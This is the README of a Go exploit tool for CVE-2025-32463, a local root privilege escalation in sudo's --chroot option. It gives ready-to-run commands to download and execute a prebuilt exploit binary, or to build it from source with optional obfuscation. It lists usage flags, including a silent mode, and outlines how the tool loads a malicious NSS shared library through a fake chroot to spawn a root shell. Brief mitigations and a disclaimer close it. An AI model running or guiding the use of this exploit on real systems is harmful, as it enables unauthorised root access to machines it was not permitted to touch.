This repository provides a Go-based exploit tool for CVE-2025-32463, a critical local privilege escalation vulnerability (CVSS 9.3) in sudo versions 1.9.14 to 1.9.17. It allows unauthorized local users to gain root access by exploiting a flaw in the --chroot (-R) option.
- CVE ID: CVE-2025-32463
- Affected Versions: sudo 1.9.14–1.9.17
- Impact: Local privilege escalation to root
- Description: The exploit manipulates the chroot environment to load a malicious shared library, setting UID/GID to 0 and spawning a root shell.
- Go 1.2+
- gcc
- libc-dev
- Vulnerable sudo version
- Non-privileged user with sudo access and
--chrootpermissions
curl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # Launches root shellgit clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # Or use garble for obfuscation
./exploit --execution| Command | Description |
|---|---|
./exploit --help |
Show usage help |
./exploit --about |
Display CVE details |
./exploit --execution |
Run exploit (opens root shell) |
./exploit --execution --silent |
Silent mode execution |
Verification: In the root shell, run id (should show uid=0(root)) or whoami (should show root).
- Creates temp dir
/tmp/sudowoot.stage.* - Generates malicious C code (
woot1337.c) for root shell - Sets up fake chroot with NSS config
- Compiles to shared lib (
libnss_/woot1337.so.2) - Runs
sudo -R woot wootto load lib and escalate - Auto-cleans temp files
- Update sudo to latest version
- Disable chroot: Add
Defaults !use_chrootto/etc/sudoers
This tool is for security research. The author is not responsible for misuse. Always test responsibly.
Built by MNM